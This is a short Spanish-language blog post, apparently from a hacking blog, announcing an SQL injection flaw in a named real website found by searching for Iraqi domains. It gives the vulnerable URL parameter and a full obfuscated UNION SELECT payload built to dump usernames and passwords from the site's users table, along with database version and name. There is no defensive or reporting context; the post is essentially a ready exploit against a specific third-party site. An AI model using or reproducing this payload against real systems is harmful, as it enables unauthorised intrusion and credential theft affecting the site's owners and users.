Bueno googleando me fui por el lado de Iraq y me puse a revisar algunos sitios y pude encontrar este dominio www.moagr.com. Este contiene un BuG de SQLi super simple EJ:.
BuG:
http://www.moagr.com/newsdet.php?id=[SQLi]
Exploit:
/**/And/**/12-12=1/**/UnIoN/**/SeleCT/**/ALl/**/1,COncAt_Ws(0x3a,id,username,passord),3,concat_ws(0x3a,unhex(hex(@@version)),unhex(hex(database())),unhex(hex(database()))),5/**/FrOm/**/users/**/wHErE/**/id=1+--+
No hay comentarios:
Publicar un comentario